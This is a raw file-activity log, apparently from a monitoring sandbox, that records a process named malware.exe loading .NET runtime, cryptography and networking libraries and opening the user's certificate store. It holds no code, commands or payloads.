29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Open1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Unknown1480C:\malware.exeC:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Monitor
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\Monitor
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:45.950Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_ec86b8d6858ec0bc\comctl32.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\RichEd20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\riched20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\riched20.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\CRYPTSP.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\cryptsp.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.75Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.90Open1480C:\malware.exeC:\Windows\SysWOW64\rsaenh.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\p2pcollab.dllp2pcollab.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\qagentrt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\ncrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcrypt.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dll
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Windows\SysWOW64\bcryptprimitives.dllbcryptprimitives.dll
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.137Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.137Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\GPAPI.dll
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\Windows\SysWOW64\gpapi.dll
29/2/2020 - 1:45:46.153Open1480C:\malware.exeC:\Windows\SysWOW64\gpapi.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs
29/2/2020 - 1:45:46.247Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\rpcss.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\rpcss.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\uxtheme.dll
29/2/2020 - 1:45:46.247Open1480C:\malware.exeC:\Windows\SysWOW64\uxtheme.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.config
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:46.293Unknown1480C:\malware.exeC:\Monitor\Malware
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\Windows\SysWOW64\l_intl.nls
29/2/2020 - 1:45:46.293Open1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\malware.exe
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\pubpol4.dat
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC\PublisherPolicy.tme
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.configmachine.config
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_32\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Unknown1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.309Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:45:46.325Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
29/2/2020 - 1:45:46.340Unknown1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:45:46.340Open1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
29/2/2020 - 1:45:46.340Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
